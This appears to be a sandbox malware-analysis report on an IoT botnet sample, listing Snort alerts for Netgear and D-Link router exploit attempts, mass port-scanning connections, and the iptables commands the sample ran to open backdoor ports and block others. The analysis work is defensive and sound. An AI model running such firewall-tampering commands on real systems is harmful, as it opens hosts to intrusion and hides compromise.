Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40506 -> 139.59.180.200:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45410 -> 45.204.39.235:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45410 -> 45.204.39.235:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53170 -> 154.208.92.84:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53170 -> 154.208.92.84:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47632 -> 13.112.197.38:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47632 -> 13.112.197.38:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43200 -> 175.119.69.229:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:35942 -> 91.195.35.202:8080
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:35942 -> 91.195.35.202:8080
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45572 -> 3.221.14.87:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45572 -> 3.221.14.87:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60680 -> 112.74.206.52:80

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic	TCP traffic: 1.18.146.134 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 36.64.16.33 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 155.116.23.175 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 68.163.230.108 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 34.144.108.84 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 29.250.199.167 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 6.141.67.12 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 129.210.175.243 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 105.137.202.218 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 54.168.251.73 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 169.134.101.55 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 50.41.174.31 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 138.7.161.211 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 175.141.183.193 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 201.10.247.77 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 190.180.20.21 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 74.69.135.216 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 74.5.187.133 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 156.194.253.153 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 156.249.53.230 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 144.110.172.80 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 55.92.128.187 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 168.30.37.171 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 185.202.14.118 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 85.233.216.179 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 216.111.216.82 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 132.35.122.63 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 166.126.250.196 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 49.215.96.136 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 91.51.225.145 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 50.71.248.204 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 176.127.83.100 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 59.17.48.95 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 11.48.52.253 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 17.164.29.91 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 72.112.217.68 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 181.52.149.110 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 82.26.244.178 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 125.102.41.232 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 145.249.112.110 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 182.183.14.60 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 108.221.87.254 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 125.113.60.52 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 91.180.74.171 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 184.12.203.227 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 44.146.63.186 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 134.191.166.14 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 135.121.123.52 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 70.170.178.192 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 99.37.65.129 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 44.51.94.199 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 133.183.45.107 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 170.223.178.160 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 206.165.78.36 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 16.184.42.108 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 207.48.109.17 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 165.40.111.59 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 198.197.25.140 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 19.139.235.199 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 24.85.80.95 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 57.51.108.187 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 116.147.238.153 ports 1,2,3,5,7,37215

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34674
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34680
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34684
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34686
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34688
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34690
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34692
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34694
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34696
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35276
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35278
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35290
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35292
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35298
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35300
Source: unknown	Network traffic detected: HTTP traffic on port 32848 -> 8443

Executes the "iptables" command to insert, remove and/or manipulate rules

Show sources

Source: /bin/sh (PID: 6827)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6857)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6863)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6897)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6913)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6935)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6948)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6973)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6992)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6995)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6998)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7010)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7067)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7093)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7122)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7145)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7163)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7179)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7200)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7216)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7230)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7248)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7261)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7290)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7316)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7319)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7327)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7351)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7378)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7405)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7426)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7439)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT	Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.20:43926 -> 149.185.53.154:81
Source: global traffic	TCP traffic: 192.168.2.20:40304 -> 155.61.123.253:81
Source: global traffic	TCP traffic: 192.168.2.20:38230 -> 105.137.202.218:49152
Source: global traffic	TCP traffic: 192.168.2.20:42082 -> 99.37.65.129:37215
Source: global traffic	TCP traffic: 192.168.2.20:33594 -> 175.141.183.193:37215
Source: global traffic	TCP traffic: 192.168.2.20:47968 -> 84.60.151.77:37215
Source: global traffic	TCP traffic: 192.168.2.20:37470 -> 132.169.224.240:8443
Source: global traffic	TCP traffic: 192.168.2.20:33484 -> 207.49.85.172:7574
Source: global traffic	TCP traffic: 192.168.2.20:52462 -> 101.215.138.244:81
Source: global traffic	TCP traffic: 192.168.2.20:46118 -> 141.139.161.123:8080
Source: global traffic	TCP traffic: 192.168.2.20:48144 -> 190.180.20.21:49152
Source: global traffic	TCP traffic: 192.168.2.20:44582 -> 97.152.141.58:8080
Source: global traffic	TCP traffic: 192.168.2.20:34278 -> 132.35.122.63:49152
Source: global traffic	TCP traffic: 192.168.2.20:42042 -> 206.66.211.183:7574
Source: global traffic	TCP traffic: 192.168.2.20:47978 -> 5.69.78.55:8443
Source: global traffic	TCP traffic: 192.168.2.20:40184 -> 138.58.82.192:8080
Source: global traffic	TCP traffic: 192.168.2.20:41086 -> 50.41.174.31:49152
Source: global traffic	TCP traffic: 192.168.2.20:52626 -> 85.233.216.179:49152
Source: global traffic	TCP traffic: 192.168.2.20:52580 -> 193.176.243.123:8080
Source: global traffic	TCP traffic: 192.168.2.20:50830 -> 59.17.48.95:37215
Source: global traffic	TCP traffic: 192.168.2.20:56092 -> 176.127.83.100:49152
Source: global traffic	TCP traffic: 192.168.2.20:39232 -> 34.144.108.84:49152
Source: global traffic	TCP traffic: 192.168.2.20:45750 -> 133.183.45.107:49152
Source: global traffic	TCP traffic: 192.168.2.20:48552 -> 43.163.194.108:8080
Source: global traffic	TCP traffic: 192.168.2.20:35468 -> 55.92.128.187:52869
Source: global traffic	TCP traffic: 192.168.2.20:48664 -> 73.227.59.34:7574
Source: global traffic	TCP traffic: 192.168.2.20:52060 -> 201.10.247.77:52869
Source: global traffic	TCP traffic: 192.168.2.20:53640 -> 1.86.24.162:5555
Source: global traffic	TCP traffic: 192.168.2.20:50032 -> 117.145.177.145:8080
Source: global traffic	TCP traffic: 192.168.2.20:60014 -> 124.193.58.88:7574
Source: global traffic	TCP traffic: 192.168.2.20:53660 -> 7.175.103.180:5555
Source: global traffic	TCP traffic: 192.168.2.20:51380 -> 103.98.158.56:81
Source: global traffic	TCP traffic: 192.168.2.20:52262 -> 135.108.6.213:8080
Source: global traffic	TCP traffic: 192.168.2.20:33314 -> 125.113.60.52:49152
Source: global traffic	TCP traffic: 192.168.2.20:36276 -> 68.204.221.204:8443
Source: global traffic	TCP traffic: 192.168.2.20:56462 -> 96.243.133.72:8080
Source: global traffic	TCP traffic: 192.168.2.20:34528 -> 144.110.172.80:37215
Source: global traffic	TCP traffic: 192.168.2.20:42294 -> 5.116.203.63:8080
Source: global traffic	TCP traffic: 192.168.2.20:52428 -> 205.102.198.206:8080
Source: global traffic	TCP traffic: 192.168.2.20:59822 -> 55.221.175.118:8443
Source: global traffic	TCP traffic: 192.168.2.20:48250 -> 159.239.202.226:5555
Source: global traffic	TCP traffic: 192.168.2.20:55236 -> 1.229.187.151:81
Source: global traffic	TCP traffic: 192.168.2.20:35456 -> 185.69.187.126:7574
Source: global traffic	TCP traffic: 192.168.2.20:42480 -> 189.6.77.233:81
Source: global traffic	TCP traffic: 192.168.2.20:38974 -> 91.51.225.145:52869
Source: global traffic	TCP traffic: 192.168.2.20:34920 -> 5.186.7.92:81
Source: global traffic	TCP traffic: 192.168.2.20:41574 -> 31.116.224.12:8443
Source: global traffic	TCP traffic: 192.168.2.20:52566 -> 49.215.96.136:49152
Source: global traffic	TCP traffic: 192.168.2.20:54116 -> 50.71.248.204:37215
Source: global traffic	TCP traffic: 192.168.2.20:40006 -> 117.41.103.207:8080
Source: global traffic	TCP traffic: 192.168.2.20:34908 -> 57.51.108.187:37215
Source: global traffic	TCP traffic: 192.168.2.20:52718 -> 151.214.152.36:81
Source: global traffic	TCP traffic: 192.168.2.20:42630 -> 210.87.19.176:8080
Source: global traffic	TCP traffic: 192.168.2.20:45752 -> 52.46.146.246:8080
Source: global traffic	TCP traffic: 192.168.2.20:46532 -> 163.196.185.185:5555
Source: global traffic	TCP traffic: 192.168.2.20:50614 -> 138.7.59.44:49152
Source: global traffic	TCP traffic: 192.168.2.20:58240 -> 6.141.67.12:52869
Source: global traffic	TCP traffic: 192.168.2.20:54036 -> 182.183.14.60:49152
Source: global traffic	TCP traffic: 192.168.2.20:33700 -> 213.37.141.115:5555
Source: global traffic	TCP traffic: 192.168.2.20:51012 -> 89.150.101.206:8080
Source: global traffic	TCP traffic: 192.168.2.20:47588 -> 126.180.188.226:7574
Source: global traffic	TCP traffic: 192.168.2.20:33908 -> 62.250.214.124:7574
Source: global traffic	TCP traffic: 192.168.2.20:36634 -> 44.146.63.186:37215
Source: global traffic	TCP traffic: 192.168.2.20:45226 -> 48.216.208.173:5555
Source: global traffic	TCP traffic: 192.168.2.20:44272 -> 203.9.163.102:8443
Source: global traffic	TCP traffic: 192.168.2.20:51112 -> 198.153.109.170:81
Source: global traffic	TCP traffic: 192.168.2.20:48618 -> 203.250.146.230:8080
Source: global traffic	TCP traffic: 192.168.2.20:38448 -> 135.121.123.52:49152
Source: global traffic	TCP traffic: 192.168.2.20:37272 -> 170.223.178.160:37215
Source: global traffic	TCP traffic: 192.168.2.20:47030 -> 16.184.42.108:52869
Source: global traffic	TCP traffic: 192.168.2.20:60426 -> 181.52.149.110:52869
Source: global traffic	TCP traffic: 192.168.2.20:49010 -> 159.14.216.23:8443
Source: global traffic	TCP traffic: 192.168.2.20:34130 -> 74.5.187.133:52869
Source: global traffic	TCP traffic: 192.168.2.20:38078 -> 58.217.250.57:8443
Source: global traffic	TCP traffic: 192.168.2.20:37196 -> 105.159.210.4:8080
Source: global traffic	TCP traffic: 192.168.2.20:39148 -> 71.13.95.149:8080
Source: global traffic	TCP traffic: 192.168.2.20:43494 -> 36.64.16.33:49152
Source: global traffic	TCP traffic: 192.168.2.20:37108 -> 47.253.230.173:5555
Source: global traffic	TCP traffic: 192.168.2.20:49774 -> 166.126.250.196:49152
Source: global traffic	TCP traffic: 192.168.2.20:34880 -> 142.135.25.78:8080
Source: global traffic	TCP traffic: 192.168.2.20:48738 -> 168.30.37.171:49152
Source: global traffic	TCP traffic: 192.168.2.20:51516 -> 173.102.232.221:5555
Source: global traffic	TCP traffic: 192.168.2.20:37574 -> 111.122.147.188:8080
Source: global traffic	TCP traffic: 192.168.2.20:55336 -> 64.136.60.132:8443
Source: global traffic	TCP traffic: 192.168.2.20:42150 -> 31.184.54.69:8080
Source: global traffic	TCP traffic: 192.168.2.20:60296 -> 111.107.14.55:8080
Source: global traffic	TCP traffic: 192.168.2.20:51774 -> 24.85.80.95:49152
Source: global traffic	TCP traffic: 192.168.2.20:43044 -> 129.210.175.243:37215
Source: global traffic	TCP traffic: 192.168.2.20:36094 -> 36.238.254.86:8080
Source: global traffic	TCP traffic: 192.168.2.20:57624 -> 201.13.139.241:8080
Source: global traffic	TCP traffic: 192.168.2.20:60788 -> 96.13.10.218:8443
Source: global traffic	TCP traffic: 192.168.2.20:34778 -> 103.69.161.106:7574
Source: global traffic	TCP traffic: 192.168.2.20:42968 -> 117.47.195.144:8080
Source: global traffic	TCP traffic: 192.168.2.20:48084 -> 134.191.166.14:49152
Source: global traffic	TCP traffic: 192.168.2.20:53088 -> 148.213.108.240:7574
Source: global traffic	TCP traffic: 192.168.2.20:52810 -> 125.221.235.0:8080
Source: global traffic	TCP traffic: 192.168.2.20:39682 -> 206.165.78.36:37215
Source: global traffic	TCP traffic: 192.168.2.20:56940 -> 116.142.239.53:8443
Source: global traffic	TCP traffic: 192.168.2.20:60816 -> 11.248.186.95:8080
Source: global traffic	TCP traffic: 192.168.2.20:60522 -> 62.174.49.184:8080
Source: global traffic	TCP traffic: 192.168.2.20:45898 -> 153.220.50.14:81
Source: global traffic	TCP traffic: 192.168.2.20:46192 -> 36.5.246.46:8080
Source: global traffic	TCP traffic: 192.168.2.20:51322 -> 106.83.13.206:8080
Source: global traffic	TCP traffic: 192.168.2.20:45798 -> 54.168.251.73:49152
Source: global traffic	TCP traffic: 192.168.2.20:42262 -> 72.112.217.68:52869
Source: global traffic	TCP traffic: 192.168.2.20:36422 -> 133.89.177.67:8080
Source: global traffic	TCP traffic: 192.168.2.20:33958 -> 21.90.118.51:7574
Source: global traffic	TCP traffic: 192.168.2.20:46510 -> 118.149.161.126:8443
Source: global traffic	TCP traffic: 192.168.2.20:43272 -> 23.181.68.106:7574
Source: global traffic	TCP traffic: 192.168.2.20:48896 -> 67.229.204.206:8080
Source: global traffic	TCP traffic: 192.168.2.20:43214 -> 193.28.36.33:8080
Source: global traffic	TCP traffic: 192.168.2.20:35272 -> 9.197.125.78:8080
Source: global traffic	TCP traffic: 192.168.2.20:40834 -> 184.12.203.227:49152
Source: global traffic	TCP traffic: 192.168.2.20:43326 -> 185.202.14.118:49152
Source: global traffic	TCP traffic: 192.168.2.20:55580 -> 80.207.49.226:8080
Source: global traffic	TCP traffic: 192.168.2.20:58080 -> 29.250.199.167:49152
Source: global traffic	TCP traffic: 192.168.2.20:43824 -> 32.96.131.217:5555
Source: global traffic	TCP traffic: 192.168.2.20:46416 -> 125.102.41.232:52869
Source: global traffic	TCP traffic: 192.168.2.20:45010 -> 121.128.113.125:8080
Source: global traffic	TCP traffic: 192.168.2.20:47312 -> 205.57.172.194:8080
Source: global traffic	TCP traffic: 192.168.2.20:44042 -> 198.197.25.140:52869
Source: global traffic	TCP traffic: 192.168.2.20:53916 -> 124.122.67.136:81
Source: global traffic	TCP traffic: 192.168.2.20:34192 -> 207.48.109.17:37215
Source: global traffic	TCP traffic: 192.168.2.20:45514 -> 33.170.253.17:8080
Source: global traffic	TCP traffic: 192.168.2.20:34956 -> 44.51.94.199:52869
Source: global traffic	TCP traffic: 192.168.2.20:33406 -> 82.26.244.178:49152
Source: global traffic	TCP traffic: 192.168.2.20:48488 -> 215.176.205.161:8080
Source: global traffic	TCP traffic: 192.168.2.20:37762 -> 138.65.229.49:8080
Source: global traffic	TCP traffic: 192.168.2.20:35378 -> 56.164.61.40:8080
Source: global traffic	TCP traffic: 192.168.2.20:44354 -> 14.6.225.98:7574
Source: global traffic	TCP traffic: 192.168.2.20:52364 -> 108.221.87.254:37215
Source: global traffic	TCP traffic: 192.168.2.20:48882 -> 155.116.23.175:52869
Source: global traffic	TCP traffic: 192.168.2.20:45642 -> 96.137.22.200:7574
Source: global traffic	TCP traffic: 192.168.2.20:36158 -> 70.170.178.192:37215
Source: global traffic	TCP traffic: 192.168.2.20:45870 -> 59.167.100.92:8443
Source: global traffic	TCP traffic: 192.168.2.20:42284 -> 28.65.109.23:8443
Source: global traffic	TCP traffic: 192.168.2.20:46744 -> 74.69.135.216:52869
Source: global traffic	TCP traffic: 192.168.2.20:56872 -> 1.18.146.134:49152
Source: global traffic	TCP traffic: 192.168.2.20:44338 -> 145.249.112.110:37215
Source: global traffic	TCP traffic: 192.168.2.20:34220 -> 182.112.56.21:37215
Source: global traffic	TCP traffic: 192.168.2.20:40646 -> 45.228.110.91:8080
Source: global traffic	TCP traffic: 192.168.2.20:40778 -> 167.154.0.215:81
Source: global traffic	TCP traffic: 192.168.2.20:50098 -> 109.162.104.119:8080
Source: global traffic	TCP traffic: 192.168.2.20:59850 -> 6.117.24.0:8080
Source: global traffic	TCP traffic: 192.168.2.20:59852 -> 148.98.127.31:7574
Source: global traffic	TCP traffic: 192.168.2.20:50362 -> 213.131.147.141:8443
Source: global traffic	TCP traffic: 192.168.2.20:60932 -> 22.225.214.100:5555
Source: global traffic	TCP traffic: 192.168.2.20:58072 -> 19.139.235.199:49152
Source: global traffic	TCP traffic: 192.168.2.20:36030 -> 174.201.122.204:8443
Source: global traffic	TCP traffic: 192.168.2.20:42960 -> 156.249.53.230:52869
Source: global traffic	TCP traffic: 192.168.2.20:46104 -> 11.48.52.253:52869
Source: global traffic	TCP traffic: 192.168.2.20:46822 -> 86.114.25.82:8080
Source: global traffic	TCP traffic: 192.168.2.20:51544 -> 216.111.216.82:37215
Source: global traffic	TCP traffic: 192.168.2.20:38618 -> 17.164.29.91:52869
Source: global traffic	TCP traffic: 192.168.2.20:42904 -> 45.234.221.196:5555
Source: global traffic	TCP traffic: 192.168.2.20:33222 -> 66.232.73.239:5555
Source: global traffic	TCP traffic: 192.168.2.20:45572 -> 59.19.242.88:8080
Source: global traffic	TCP traffic: 192.168.2.20:37966 -> 91.180.74.171:49152
Source: global traffic	TCP traffic: 192.168.2.20:34904 -> 131.16.172.129:5555
Source: global traffic	TCP traffic: 192.168.2.20:48872 -> 72.242.88.155:81
Source: global traffic	TCP traffic: 192.168.2.20:54330 -> 156.194.253.153:37215
Source: global traffic	TCP traffic: 192.168.2.20:57496 -> 33.91.25.116:81
Source: global traffic	TCP traffic: 192.168.2.20:57568 -> 169.134.101.55:49152
Source: global traffic	TCP traffic: 192.168.2.20:47480 -> 110.10.168.48:5555
Source: global traffic	TCP traffic: 192.168.2.20:43214 -> 171.5.81.156:8080
Source: global traffic	TCP traffic: 192.168.2.20:58042 -> 68.163.230.108:52869
Source: global traffic	TCP traffic: 192.168.2.20:60804 -> 210.219.207.3:8080
Source: global traffic	TCP traffic: 192.168.2.20:52896 -> 213.58.83.64:81
Source: global traffic	TCP traffic: 192.168.2.20:35732 -> 125.234.106.133:8080
Source: global traffic	TCP traffic: 192.168.2.20:38762 -> 182.149.146.177:8080
Source: global traffic	TCP traffic: 192.168.2.20:49036 -> 138.7.161.211:52869
Source: global traffic	TCP traffic: 192.168.2.20:47654 -> 109.61.100.248:8080
Source: global traffic	TCP traffic: 192.168.2.20:58694 -> 94.166.64.10:5555
Source: global traffic	TCP traffic: 192.168.2.20:48986 -> 163.70.83.83:8080
Source: global traffic	TCP traffic: 192.168.2.20:43100 -> 183.250.239.211:8080
Source: global traffic	TCP traffic: 192.168.2.20:37622 -> 33.54.67.97:8080
Source: global traffic	TCP traffic: 192.168.2.20:55968 -> 84.62.5.182:8443
Source: global traffic	TCP traffic: 192.168.2.20:46258 -> 116.147.238.153:37215
Source: global traffic	TCP traffic: 192.168.2.20:34866 -> 6.232.250.250:8080
Source: global traffic	TCP traffic: 192.168.2.20:33864 -> 1.5.148.231:8080
Source: global traffic	TCP traffic: 192.168.2.20:39298 -> 55.77.192.67:8443
Source: global traffic	TCP traffic: 192.168.2.20:34300 -> 220.89.101.239:8443
Source: global traffic	TCP traffic: 192.168.2.20:52116 -> 187.133.162.42:5555
Source: global traffic	TCP traffic: 192.168.2.20:34318 -> 105.202.244.96:7574
Source: global traffic	TCP traffic: 192.168.2.20:43462 -> 103.16.83.23:7574
Source: global traffic	TCP traffic: 192.168.2.20:33290 -> 153.153.124.97:8080
Source: global traffic	TCP traffic: 192.168.2.20:57636 -> 137.8.108.189:5555
Source: global traffic	TCP traffic: 192.168.2.20:59940 -> 77.186.145.187:5555
Source: global traffic	TCP traffic: 192.168.2.20:42288 -> 16.119.106.89:8080
Source: global traffic	TCP traffic: 192.168.2.20:47410 -> 77.137.8.165:8080
Source: global traffic	TCP traffic: 192.168.2.20:36216 -> 42.241.34.105:8080
Source: global traffic	TCP traffic: 192.168.2.20:40810 -> 183.238.2.60:81
Source: global traffic	TCP traffic: 192.168.2.20:56094 -> 165.40.111.59:52869
Source: global traffic	TCP traffic: 192.168.2.20:54388 -> 211.72.191.195:8080
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 203.204.92.244:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 76.179.94.31:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 47.178.77.204:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 121.121.241.203:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 85.26.236.253:2323
